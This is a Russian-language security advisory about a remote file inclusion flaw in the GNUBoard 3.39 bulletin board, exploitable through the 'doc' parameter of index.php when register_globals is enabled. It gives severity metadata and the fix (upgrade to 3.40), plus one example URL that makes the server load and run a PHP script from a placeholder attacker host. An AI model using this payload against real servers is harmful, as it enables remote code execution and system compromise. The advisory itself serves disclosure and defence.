Удаленное выполнение команд в GNUBoard

Дата публикации:
21.12.2004
Дата изменения:
30.01.2009
Всего просмотров:
1151
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
GNUBoard 3.x
Уязвимые версии: GNUBoard 3.39 и более ранние версии

Описание:
Уязвимость обнаружена в GNUBoard. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость существует из-за некорректной фильтрации данных в параметре doc файла index.php при включенной опции register_globals в файле php.ini. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе с правами текущего web сервера. Пример:

http://[target]/gnu3/index.php?doc=http://[attacker]/[attack].php

URL производителя: www.sir.co.kr

Решение: Установите последнюю версию 3.40 с сайта производителя.

Ссылки: GNUBoard PHP injection vulnerability

или введите имя

CAPTCHA